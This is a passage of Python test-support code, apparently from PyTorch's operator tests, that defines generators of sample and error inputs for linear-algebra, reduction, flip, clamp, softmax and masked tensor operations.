A = make_arg(shape) if not full_rank else make_arg(*shape) yield SampleInput(A, kwargs={"pivot": pivot}, output_process_fn_grad=out_fn) def sample_inputs_lu_solve(op_info, device, dtype, requires_grad=False, **kwargs): make_fn = make_fullrank_matrices_with_distinct_singular_values make_a = partial(make_fn, dtype=dtype, device=device) make_b = partial(make_tensor, dtype=dtype, device=device) batches = ((), (0, ), (2, )) ns = (5, 3, 0) nrhs = (0, 1, 6) for n, batch, rhs in product(ns, batches, nrhs): shape_a = batch + (n, n) a = make_a(*shape_a) lu, pivs = a.lu() lu = lu.contiguous() shape_b = batch + (n, rhs) b = make_b(shape_b) grads = (False,) if not requires_grad else (True, False) # we try all possible combinations of requires_grad for each input for lu_grad, b_grad in product(grads, grads): # when requires_grad == True, at least one input has to have requires_grad enabled if requires_grad and not lu_grad and not b_grad: continue lu_ = lu.clone() lu_.requires_grad_(lu_grad) b_ = b.clone() b_.requires_grad_(b_grad) yield SampleInput(b_, args=(lu_, pivs)) def sample_inputs_lu_unpack(op_info, device, dtype, requires_grad=False, **kwargs): def out_fn(output): return output[1], output[2] for lu_sample in sample_inputs_linalg_lu(op_info, device, dtype, requires_grad, **kwargs): lu_data, pivots = torch.linalg.lu_factor(lu_sample.input) lu_data.requires_grad_(requires_grad) yield SampleInput(lu_data, args=(pivots,), output_process_fn_grad=out_fn) def sample_inputs_roll(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) args = ((0, 0), (1, 2), (0, 2), (2, 0), (-1, 0), (10000, 1), (2,), ((1, 2, -1), (0, 1, 2))) for arg in args: yield SampleInput(make_arg((0, 0, 0)), args=arg) yield SampleInput(make_arg((S, S, S)), args=arg) def error_inputs_roll(op_info, device, **kwargs): err_msg1 = "`shifts` required" s1 = SampleInput( make_tensor((S,), dtype=torch.float32, device=device), args=(tuple(),) ) yield ErrorInput(s1, error_regex=err_msg1) err_msg2 = ("shifts and dimensions must align") s2 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), args=((2, 1), 0) ) yield ErrorInput(s2, error_regex=err_msg2) err_msg3 = ("out of range") s3 = SampleInput( make_tensor((S, ), dtype=torch.float32, device=device), args=(0, 2) ) yield ErrorInput(s3, error_regex=err_msg3, error_type=IndexError) def sample_inputs_rot90(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) args = itertools.product(range(-5, 6), [(0, 1), (1, 2), (1, -1)]) yield SampleInput(make_arg((S, S, S))) for arg in args: yield SampleInput(make_arg((S, S, S)), args=arg) def error_inputs_rot90(op_info, device, **kwargs): err_msg1 = "expected total rotation dims" s1 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (0,)} ) yield ErrorInput(s1, error_regex=err_msg1) err_msg2 = "expected total dims >= 2" s2 = SampleInput( make_tensor((S,), dtype=torch.float32, device=device), ) yield ErrorInput(s2, error_regex=err_msg2) err_msg3 = "expected rotation dims to be different" s3 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (1, 1)} ) yield ErrorInput(s3, error_regex=err_msg3) def sample_inputs_std_var(op_info, device, dtype, requires_grad, **kwargs): tensor_nd = partial(make_tensor, (S, S, S), device=device, dtype=dtype, requires_grad=requires_grad) tensor_1d = 
partial(make_tensor, (S,), device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(tensor_nd()), SampleInput(tensor_nd(), kwargs=dict(dim=1)), SampleInput(tensor_nd(), kwargs=dict(dim=1, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=False, keepdim=False)), SampleInput(tensor_nd(), kwargs=dict(dim=(1,), correction=S // 2)), SampleInput(tensor_nd(), kwargs=dict(dim=None, correction=0, keepdim=True)), ] def _generate_correlation_inputs(device, dtype, requires_grad, **kwargs): shapes = [(2,), (1, 2), (3, 2), (2, 3)] for shape in shapes: yield make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) def sample_inputs_corrcoef(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(t) for t in _generate_correlation_inputs(device, dtype, requires_grad)] def sample_inputs_cov(op_info, device, dtype, requires_grad, **kwargs): inputs = [] for t in _generate_correlation_inputs(device, dtype, requires_grad): inputs.append(SampleInput(t)) num_observations = t.numel() if t.ndimension() < 2 else t.size(1) fweights = make_tensor((num_observations,), dtype=torch.int, device=device, low=1, high=10) aweights = make_tensor((num_observations,), dtype=torch.float, device=device, low=0, high=1, requires_grad=requires_grad) for correction, fw, aw in product(range(num_observations), [None, fweights], [None, aweights]): inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), kwargs={'correction': correction, 'fweights': fw, 'aweights': aw})) return inputs def error_inputs_cov(op_info, device, **kwargs): a = torch.rand(S, device=device) error_inputs = [] error_inputs.append(ErrorInput( SampleInput(torch.rand(S, S, S, device=device)), error_regex="expected input to have two or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, S, device=device)}), error_regex="expected fweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(S, S, device=device)}), error_regex="expected aweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, device=device)}), error_regex="expected fweights to have integral dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([1, 1], device=device)}), error_regex="expected aweights to have floating point dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([1], device=device)}), error_regex="expected fweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(1, device=device)}), error_regex="expected aweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([-1, -2, -3, -4 , -5], device=device)}), error_regex="fweights cannot be negative")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([-1., -2., -3., -4., -5.], device=device)}), error_regex="aweights cannot be negative")) return error_inputs def sample_inputs_svd(op_info, device, dtype, requires_grad=False, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) is_linalg_svd = (op_info.name == "linalg.svd") batches = [(), (0, ), (3, )] ns = [0, 3, 5] def 
uniformize(usv):
        S = usv[1]
        k = S.shape[-1]
        U = usv[0][..., :k]
        Vh = usv[2] if is_linalg_svd else usv[2].mH
        Vh = Vh[..., :k, :]
        return U, S, Vh

    def fn_U(usv):
        U, _, _ = uniformize(usv)
        return U.abs()

    def fn_S(usv):
        return uniformize(usv)[1]

    def fn_Vh(usv):
        # We also return S to test it alongside Vh
        _, S, Vh = uniformize(usv)
        return S, Vh.abs()

    def fn_UVh(usv):
        U, S, Vh = uniformize(usv)
        return U @ Vh, S

    fns = (fn_U, fn_S, fn_Vh, fn_UVh)

    fullmat = 'full_matrices' if is_linalg_svd else 'some'

    for batch, n, k, fullmat_val, fn in product(batches, ns, ns, (True, False), fns):
        shape = batch + (n, k)
        yield SampleInput(make_arg(*shape), kwargs={fullmat: fullmat_val}, output_process_fn_grad=fn)

def sample_inputs_permute(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    cases = [((1, 2, 3, 4), (0, 2, 3, 1)),
             ((1, 2, 3, 4), (0, -2, -1, 1)),
             ((), ()),
             ((1, 2, 3, 4), (2, 1, 3, 0))]

    for shape, args in cases:
        yield SampleInput(make_arg(shape), args=(args,))

def reference_inputs_permute(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_permute(op, device, dtype, requires_grad, **kwargs)

    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    cases = (
        ((), ()),
        ((1,), (0,)),
        ((2, 2), (1, 0)),
        ((2, 2), (0, 1)),
        ((2, 0, 1), (0, 2, 1)),
        ((3, 4, 2), (2, 1, 0)),
        ((3, 4, 2), (1, 0, 2)),
        ((3, 4, 2), (0, 1, 2)),
    )

    # Adds tricky permutations and permutations with noncontiguity
    for shape, permutation in cases:
        for p in itertools.permutations(permutation):
            a = make_arg(shape).permute(p)
            yield SampleInput(a, args=(permutation,))

            a = make_arg(shape, noncontiguous=True).permute(p)
            yield SampleInput(a, args=(permutation,))

def sample_inputs_linalg_svdvals(op_info, device, dtype, requires_grad=False, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    batches = [(), (0, ), (2, ), (1, 1)]
    ns = [5, 2, 0]

    for batch, m, n in product(batches, ns, ns):
        yield SampleInput(make_arg(batch + (m, n)))

def sample_inputs_softshrink_hardshrink_hardtanh(op_info, device, dtype, requires_grad=False, **kwargs):
    N = 10
    tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype,
                                       requires_grad=requires_grad)) for _ in range(1, N)]
    return tensors

def sample_inputs_eig(op_info, device, dtype, requires_grad=False, **kwargs):
    eigvecs = make_tensor((S, S), device=device, dtype=dtype, low=None, high=None)
    eigvals = make_tensor((S,), device=device, dtype=dtype, low=None, high=None)
    # we produce only diagonalizable inputs which do not have
    # complex eigenvalues for real inputs, as there is no
    # backward implementation for real inputs with complex
    # eigenvalues yet.
    input = (eigvecs * eigvals.unsqueeze(-2)) @ eigvecs.inverse()
    input.requires_grad_(requires_grad)

    def process_output(eigpair):
        eigvals, eigvecs = eigpair
        if dtype.is_complex:
            # eig produces eigenvectors which are normalized to 1 norm.
            # Note that if v is an eigenvector, so is v * e^{i \phi},
            # and |v| = |v * e^{i \phi}| = 1.
            # This, however, makes the eigenvector backward computation process
            # rather unstable unless the objective function is gauge-invariant,
            # that is if f(z) == f(|z|), for example.
            # Hence for complex inputs we ignore the phases and return only
            # the absolute values.
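            # For example, f(v) = |v| is unchanged under v -> v * e^{i \phi},
            # which is why only absolute values are returned below.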
return eigvals, eigvecs.abs() else: return eigvals, eigvecs return [ SampleInput( input, kwargs=dict(eigenvectors=True), output_process_fn_grad=process_output ), ] def sample_inputs_einsum(op_info, device, dtype, requires_grad=False, **kwargs): def c(t): return t.clone().requires_grad_(requires_grad) x = make_tensor((3,), dtype=dtype, device=device, requires_grad=requires_grad) y = make_tensor((4,), dtype=dtype, device=device, requires_grad=requires_grad) A = make_tensor((2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) B = make_tensor((1, 3,), dtype=dtype, device=device, requires_grad=requires_grad) C = make_tensor((1, 2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) D = make_tensor((1, 3, 4,), dtype=dtype, device=device, requires_grad=requires_grad) E = make_tensor((4, 4,), dtype=dtype, device=device, requires_grad=requires_grad) H = make_tensor((3, 3,), dtype=dtype, device=device, requires_grad=requires_grad) I = make_tensor((1, 3, 1,), dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] # Vector operations inputs.append(SampleInput([c(x)], args=('i->',))) # sum inputs.append(SampleInput([c(x), c(y)], args=('i,j->ij',))) # outer # Matrix operations inputs.append(SampleInput([c(A)], args=("ij->i",))) # col sum inputs.append(SampleInput([c(A), c(B)], args=("ij,kj->ik",))) # matmul inputs.append(SampleInput([c(A), c(E)], args=("ij,Ab->ijAb",))) # matrix outer product # Tensor operations inputs.append(SampleInput([c(C), c(D)], args=("aij,ajk->aik",))) # batch matmul inputs.append(SampleInput([c(D), c(E)], args=("aij,jk->aik",))) # tensor matrix contraction inputs.append(SampleInput([c(C), c(B)], args=("ijk,ik->j",))) # non contiguous # Test diagonals inputs.append(SampleInput([c(I)], args=('iji->j',))) # non-contiguous trace # Test ellipsis inputs.append(SampleInput([c(H)], args=("i...->...",))) inputs.append(SampleInput([c(C), c(x)], args=('...ik, ...j -> ij',))) return inputs def sample_inputs_linalg_qr_geqrf(op_info, device, dtype, requires_grad=False, **kwargs): # QR is just well defined when the matrix is full rank make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0,), (2, ), (1, 1)] ns = [5, 2, 0] for batch, (m, n) in product(batches, product(ns, ns)): shape = batch + (m, n) yield SampleInput(make_arg(*shape)) def sample_inputs_flip(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((S, M, S), (S, 0, M)) all_dims = ((0, 1, 2), (0,), (0, 2), (-1,), ()) for size, dims in product(sizes, all_dims): yield SampleInput(make_arg(size), kwargs={"dims": dims}) def sample_inputs_fliplr_flipud(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((S, 0, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def error_inputs_fliplr(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((1,), dtype=torch.float, device=device)), error_regex="Input must be >= 2-d.") def error_inputs_flipud(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((), dtype=torch.float, device=device)), error_regex="Input must be >= 1-d.") # TODO: clamp shares tensors among its sample inputs --- we should prohibit this! 
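# Illustrative sketch (an assumption for exposition, not used by the test
# framework): sample_inputs_* functions produce SampleInput objects whose
# .input/.args/.kwargs are forwarded to the op under test, roughly as in the
# hypothetical helper below.
def _demo_run_clamp_samples(device='cpu', dtype=torch.float32):
    # op_info is unused by sample_inputs_clamp, so None suffices here
    for si in sample_inputs_clamp(None, device, dtype, requires_grad=False):
        torch.clamp(si.input, *si.args, **si.kwargs)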
def sample_inputs_clamp(op_info, device, dtype, requires_grad, **kwargs):
    x = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
    lb = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
    ub = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)

    def detach(tensor):
        return tensor.clone().detach_().requires_grad_(requires_grad)

    return [
        SampleInput(detach(x), args=(lb, ub)),
        SampleInput(detach(x), args=(detach(lb[0]), detach(ub[0]))),
        SampleInput(detach(x), args=(detach(lb[:, :1]),)),
    ]


def reference_inputs_elementwise_ternary(op, device, dtype, requires_grad, *, sample_inputs_func, supports_scalars=False, **kwargs):
    yield from sample_inputs_func(op, device, dtype, requires_grad, **kwargs)

    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    make_scalar_tensor = partial(make_tensor, (), device='cpu', dtype=dtype, requires_grad=requires_grad)
    supported_dtypes = op.supported_dtypes(device)

    # broadcasting and noncontiguous cases
    cases = (
        ((4, 4), (4, 4), (4, 4)),
        ((4, 4), (1, 4, 4), (4, 4)),
        ((4, 4), (1, 4, 4), (4, 1, 4)),
        ((4, 4, 1), (1, 4, 4), (4, 4)),
        ((4, 1), (1, 4, 4), (1, 4)),
        ((4, 4), (), (4, 4)),
        ((4, 4), (), ()),
        ((), (4, 4), (1, 4, 4)),
    )

    for a, b, c in cases:
        yield SampleInput(make_arg(a), args=(make_arg(b), make_arg(c)))
        yield SampleInput(make_arg(a, noncontiguous=True),
                          args=(make_arg(b).transpose(0, -1),
                                make_arg(c, noncontiguous=True).transpose(0, -1)))

    # scalar cases
    if supports_scalars:
        cases = [
            ((), 1, 2,),
            ((), 1., 2),
            ((4, 4), 1., 2,),
            ((3, 4), make_scalar_tensor(), make_scalar_tensor()),
        ]

        if torch.complex64 in supported_dtypes:
            cases.extend([
                ((3, 1, 4), complex(1, 2), 3.),
            ])

        for a, b, c in cases:
            yield SampleInput(make_arg(a), args=(b, c))

    # type promotion cases
    # int x float
    if torch.float in supported_dtypes and torch.long in supported_dtypes:
        a = make_arg((), dtype=torch.long)
        b = make_arg((1, 4), dtype=torch.float)
        c = make_arg((3, 4))

        cases = (
            (a, b, c),
            (c, a, b),
        )

        for a, b, c in cases:
            yield SampleInput(a, args=(b, c))

    # NaN propagation
    if dtype.is_floating_point or dtype.is_complex:
        nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan'))

        a = make_arg((12,))
        a[4] = nan
        a[7] = nan
        b = make_arg((12,))
        b[1] = nan
        b[7] = nan
        c = make_arg((12,))
        c[9] = nan

        yield SampleInput(a, args=(b, c))


def _clamp_numpy(a, min=None, max=None):
    if min is None:
        return np.minimum(a, max)
    if max is None:
        return np.maximum(a, min)

    return np.minimum(max, np.maximum(a, min))


def sample_inputs_clamp_scalar(op_info, device, dtype, requires_grad, **kwargs):
    tensors = (
        make_tensor((2, 3, 2), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
        make_tensor((2, 0, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
    )

    if dtype is torch.uint8:
        min_max_vals = ((2, 5), (3, 7))
    else:
        min_max_vals = ((0, 1), (-1, 1))

    output = [SampleInput(
        tensor.clone().requires_grad_(requires_grad),
        args=vals) for tensor, vals in product(tensors, min_max_vals)]
    output += [
        SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(0.5, None)),
        SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(None, 0.5))]
    empty_tensor = make_tensor((), device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad)
    output.append(SampleInput(empty_tensor, args=(0.0, 1.0)))
    return output


def sample_kwargs_clamp_scalar(device,
dtype, input): if dtype is torch.uint8: min_val, max_val = (random.randint(1, 3), random.randint(4, 8)) elif dtype.is_floating_point: min_val, max_val = (random.uniform(-8, 0), random.uniform(1, 8)) # type: ignore[assignment] else: min_val, max_val = (random.randint(-8, 0), random.randint(1, 8)) return {'min': min_val, 'max': max_val}, {'a_min': min_val, 'a_max': max_val} def sample_inputs_cross(op_info, device, dtype, requires_grad, **kwargs): sample0 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),)) sample1 = SampleInput(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': 1}) sample2 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': -1}) return (sample0, sample1, sample2) def sample_inputs_cumprod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_zeros(dim_select): assert len(dim_select) == 2 result = make_arg(3 * (S,)) result.narrow(dim_select[0], 0, 1).narrow(dim_select[1], 1, 1).zero_() result.narrow(dim_select[0], 2, 1).narrow(dim_select[1], 3, 1).zero_() result.narrow(dim_select[0], 4, 1).narrow(dim_select[1], 3, 1).zero_() return result for dim in range(3): yield SampleInput(make_arg((S, S, S)), args=(dim,)) # Scalar tensors and empty tensor for size in [(), (1,), (0,)]: yield SampleInput(make_arg(size), args=(0,)) yield SampleInput(prod_zeros([0, 1]), args=(1,)) yield SampleInput(prod_zeros([0, 2]), args=(1,)) yield SampleInput(prod_zeros([1, 2]), args=(1,)) # test dtype kwarg yield SampleInput(prod_zeros([1, 2]), args=(1,), kwargs={'dtype': dtype}) def sample_inputs_view_as_complex(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(make_tensor((S, 2), dtype=dtype, device=device, requires_grad=requires_grad),)] def sample_inputs_view_as_real(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def sample_inputs_prod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_single_zero(): result = make_arg(2 * (S,)) result[0, 1] = 0 return result for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): # only Tensor, ignore other inputs yield SampleInput(sample.input.clone().requires_grad_(requires_grad)) yield sample # Generates samples with keepdim = True for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): sample.kwargs['keepdim'] = True yield sample yield SampleInput(prod_single_zero()) yield SampleInput(make_arg((3, 3, 3)), args=(1,)) yield SampleInput(make_arg((3, 3, 3)), args=(1,), kwargs={'keepdim': True}) # test zero scalar tensor zero = make_arg(()) zero.zero_() yield 
SampleInput(zero.clone().requires_grad_(requires_grad))
    yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,))
    yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,),
                      kwargs={'keepdim': True})


def error_inputs_neg(op_info, device, **kwargs):
    si = SampleInput(torch.tensor((False, True), device=device))
    msg = ("Negation, the `\\-` operator, on a bool tensor is not supported."
           " If you are trying to invert a mask, use the `\\~` or"
           " `logical_not\\(\\)` operator instead.")
    return (ErrorInput(si, error_regex=msg),)


def sample_inputs_diag(op_info, device, dtype, requires_grad, **kwargs):
    vec_sample = SampleInput(make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))

    tensors = (
        make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
        make_tensor((3, 5), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
        make_tensor((5, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
    )

    args = ((), (2,), (-2,), (1,), (2,))

    samples = []
    for tensor, arg in product(tensors, args):
        samples.append(SampleInput(tensor.clone().requires_grad_(requires_grad), args=arg))

    return samples + [vec_sample]


def sample_inputs_diagonal_diag_embed(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # Shapes for 2D Tensors
    shapes_2d = ((M, M), (3, 5), (5, 3))

    # Shapes for 3D Tensors
    shapes_3d = ((M, M, M),)

    kwargs_2d = (dict(), dict(offset=2), dict(offset=2), dict(offset=1))
    kwargs_3d = (dict(offset=1, dim1=1, dim2=2),
                 dict(offset=2, dim1=0, dim2=1),
                 dict(offset=-2, dim1=0, dim2=1))

    for shape, kwarg in chain(product(shapes_2d, kwargs_2d), product(shapes_3d, kwargs_3d)):
        yield SampleInput(make_arg(shape), kwargs=kwarg)


def sample_inputs_diagonal_scatter(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # Shapes for 2D Tensors
    shapes_2d = ((M, M), (3, 5), (5, 3))

    # Shapes for 3D Tensors
    shapes_3d = ((M, M, M),)

    args_2d = ((), (2,), (-2,), (1,))
    args_3d = ((1, 1, 2), (2, 0, 1), (-2, 0, 1))

    for input_shape, arg in chain(product(shapes_2d, args_2d), product(shapes_3d, args_3d)):
        input_ = make_arg(input_shape)
        # We can programmatically figure out the right shape for src:
        # It should be the same size as input.diagonal(other_args...)
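        # e.g. (illustrative):
        #   >>> torch.zeros(4, 4, 4).diagonal(1, 1, 2).shape
        #   torch.Size([4, 3])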
if not isinstance(arg, tuple): arg_tuple = (arg,) else: arg_tuple = arg src_shape = input_.diagonal(*arg_tuple).size() src = make_arg(src_shape) yield SampleInput(input_, args=(src, *arg_tuple)) def sample_inputs_to_sparse(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((S, S)), args=(), output_process_fn_grad=lambda x: x.to_dense()), SampleInput(make_arg((S, S)), args=(1,), output_process_fn_grad=lambda x: x.to_dense()),) def sample_inputs_cross_entropy(op_info, device, dtype, requires_grad, **kwargs): batch_size, num_classes = shape = (2, 3) reductions = ("mean", "sum", "none") input_shape_and_kwargs: List[Tuple[Tuple[int, ...], Dict[str, Any]]] = [ (shape, dict()), ((*shape, 1), dict()), ((*shape, 1, 2), dict()), ((*shape, 1, 2, 3), dict()), *[(shape, dict(reduction=reduction)) for reduction in reductions], *[ ( shape, dict( weight=make_tensor((num_classes,), device=device, dtype=dtype), reduction=reduction, ), ) for reduction in reductions ], (shape, dict(ignore_index=1)), ] sample_inputs = [] for (input_shape, kwargs), probabilities_target in itertools.product(input_shape_and_kwargs, (False, True)): input = make_tensor(input_shape, device=device, dtype=dtype, requires_grad=requires_grad) if probabilities_target: # ignore_index is not supported for probabilities target if "ignore_index" in kwargs: continue target = make_tensor( input_shape, low=0, high=1, device=device, dtype=dtype, requires_grad=requires_grad, ) else: target = make_tensor( (batch_size, *input_shape[2:]), low=0, high=num_classes, device=device, dtype=torch.long, ) if "ignore_index" in kwargs and torch.all(target == kwargs["ignore_index"]): # make sure at least one item in target is not ignored target[0] = random.sample(set(range(num_classes)) - {kwargs["ignore_index"]}, 1)[0] sample_inputs.append(SampleInput(input, args=(target,), kwargs=kwargs)) return sample_inputs # Used for log_softmax, softmax, softmin def sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, with_dtype=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = [ ((S, ), (0, )), ((S, S), (0, )), ((S, S), (1, )), ((S, S), (-1, )), ((S, M, S), (2, )), ] # PyTorch on XLA throws an error when passed with dim argument for 0d tensor. # See https://github.com/pytorch/xla/issues/3061 for more details. if torch.device(device).type != 'xla': cases.append(((), (0, ))) return [ SampleInput(make_arg(shape), args=dim, kwargs=dict(dtype=torch.float64) if with_dtype else None) for shape, dim in cases ] def sample_inputs_masked_softmax(op_info, device, dtype, requires_grad, with_dtype=False, **kwargs): """Sample inputs for masked softmax, log_softmax, and softmin. Masked normalization operator is a reduction operator with trailing mask optional argument. A mask is a bool tensor with the same shape as input or a shape that is broadcastable to input shape. 
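    For example (illustrative), an input of shape (S, S) may be paired with a
    mask of shape (S, S), or with a broadcastable mask of shape (1, S) or ().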
""" inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, with_dtype=with_dtype, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_cumops(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked cumsum and cumprod. """ inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): if type(mask) != torch.Tensor: continue sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) if 'keepdim' in sample_input_kwargs: sample_input_kwargs.pop('keepdim') # dimension is required if sample_input_args: dim = sample_input.args[0] else: if 'dim' not in sample_input_kwargs: continue dim = sample_input_kwargs.pop('dim') sample_input_args = (dim,) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_normalize(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked normalize. """ inputs: List[SampleInput] = [] for ord in [2.0, 1, float('inf'), float('-inf'), 0]: for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy() inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_logit(op_info, device, dtype, requires_grad, **kwargs): low, high = op_info.domain # Note: Operator is very sensitive at points near the # start and end of domain and leads to NaN for float16 # if domain_eps is 1e-5. domain_eps = op_info._domain_eps if dtype != torch.float16 else 3e-2 low = low + domain_eps high = high - domain_eps samples = ( SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), ) return samples def sample_inputs_isin(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # isin has two paths based on the size of elements and test_elements. 
